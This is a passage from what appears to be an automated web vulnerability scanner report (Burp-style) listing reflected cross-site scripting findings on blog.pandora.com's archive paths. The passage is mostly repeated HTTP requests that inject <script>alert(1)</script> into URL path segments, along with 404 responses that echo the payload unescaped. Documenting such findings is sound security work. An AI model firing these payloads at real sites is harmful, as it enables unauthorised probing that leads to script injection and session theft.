Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ was not found on this server.</p>
...[SNIP]...

1.198. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b55f0<script>alert(1)</script>a60f65ec066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ was not found on this server.</p>
...[SNIP]...

1.199. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cddd<script>alert(1)</script>c07d7b6b6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ was not found on this server.</p>
...[SNIP]...

1.200. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc45<script>alert(1)</script>73d64655690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ was not found on this server.</p>
...[SNIP]...

1.201. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3275c<script>alert(1)</script>7f101df09f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ was not found on this server.</p>
...[SNIP]...

1.202. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48254<script>alert(1)</script>063e227bb42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ was not found on this server.</p>
...[SNIP]...

1.203. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee644<script>alert(1)</script>e5f841d0237 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ was not found on this server.</p>
...[SNIP]...

1.204. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da5b9<script>alert(1)</script>ee09fe65134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ was not found on this server.</p>
...[SNIP]...

1.205. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload caeac<script>alert(1)</script>9cab335ec9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ was not found on this server.</p>
...[SNIP]...

1.206. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f8a9<script>alert(1)</script>cdadd2e3fba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ was not found on this server.</p>
...[SNIP]...

1.207. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a732<script>alert(1)</script>04358b3b570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ was not found on this server.</p>
...[SNIP]...

1.208. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb43c<script>alert(1)</script>796ed772059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ was not found on this server.</p>
...[SNIP]...

1.209. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad1ff<script>alert(1)</script>c05ada4297f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ was not found on this server.</p>
...[SNIP]...

1.210. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241d1<script>alert(1)</script>0051722519f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ was not found on this server.</p>
...[SNIP]...

1.211. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47148<script>alert(1)</script>a7a6b182afd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ was not found on this server.</p>
...[SNIP]...

1.212. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6439<script>alert(1)</script>47ec2e2aa5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ was not found on this server.</p>
...[SNIP]...

1.213. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0786<script>alert(1)</script>1fdd8212aca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ was not found on this server.</p>
...[SNIP]...

1.214. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e31a9<script>alert(1)</script>92fb96256a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
